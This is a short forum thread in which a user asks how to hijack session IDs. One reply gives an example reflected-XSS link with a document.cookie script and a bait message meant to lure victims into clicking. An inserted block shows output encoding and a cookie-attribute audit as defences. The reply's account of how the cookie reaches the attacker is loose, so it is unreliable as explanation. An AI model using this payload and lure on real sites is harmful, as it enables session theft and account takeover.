
Session ID's


ghost's Avatar
0 0

How would I hijack a Session ID? I have looked all over Google. A nice article would be nice :)


ghost's Avatar
0 0

This is more commonly known as XSS or cross site scripting attacks. Basically you just get someone's session id by some type of malformed request/input to a site, like posting this fictitious text and link:

hahaha omfg lik this is tha funniest shiznit i eva saw!!! w0t a n00b this guy is, check it out lol lol lmao monkeys.com/haxor.php?sessionid=<script>document.cookie</script>

Assuming this was a legitimate vulnerability, and assuming someone was dumb enough to see 'w0t was so funny', they'd quickly find out that they've clicked on a URL that sends their cookie info to an evil hax0r's page designed to catch the information. They could then swap out their cookie info with your own and be logged in as 'you'.

It's worth noting that this is a very old trick at this point and the majority of XSS attacks are easily prevented these days. Then again, as Einstein said…

Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.

Can't believe how many sites are vulnerable to the stupidest of things. =)
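The defensive side of the scenario in the post above, as an added example that is not part of the original thread: the reflected `sessionid` parameter is shown unencoded and then output-encoded, and a small auditor flags session cookies that page script could read. The function names and the sample `Set-Cookie` values are constructed for illustration.

```javascript
// Added example; all function names and sample values are hypothetical.

// Encode the characters that let a reflected value turn into markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the query parameter is echoed into the page unchanged,
// so markup in the URL becomes markup in the response.
function renderVulnerable(sessionid) {
  return '<p>Session: ' + sessionid + '</p>';
}

// "After": the same page with the parameter output-encoded.
function renderHardened(sessionid) {
  return '<p>Session: ' + escapeHtml(sessionid) + '</p>';
}

// Parse one Set-Cookie header value and list the protective attributes it lacks.
function auditSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const seen = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  const findings = [];
  if (!seen.has('httponly')) findings.push('HttpOnly missing: cookie is readable via document.cookie');
  if (!seen.has('secure')) findings.push('Secure missing: cookie is also sent over plain HTTP');
  if (!seen.has('samesite')) findings.push('SameSite not set explicitly');
  return { name, findings };
}

// Constructed sample input: the parameter value from the post and two cookie headers.
const sample = '<script>document.cookie</script>';
console.log(renderVulnerable(sample)); // script tag survives intact
console.log(renderHardened(sample));   // rendered as inert text
console.log(auditSetCookie('sessionid=abc123; Path=/'));
console.log(auditSetCookie('sessionid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'));
```

Output encoding removes the injection point, and `HttpOnly` keeps the session cookie out of reach of script if an injection point is missed elsewhere.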


ghost's Avatar
0 0

Thanks man, so it's like kind of cookie poisoning?


ghost's Avatar
0 0

I don't think that's quite what he's asking…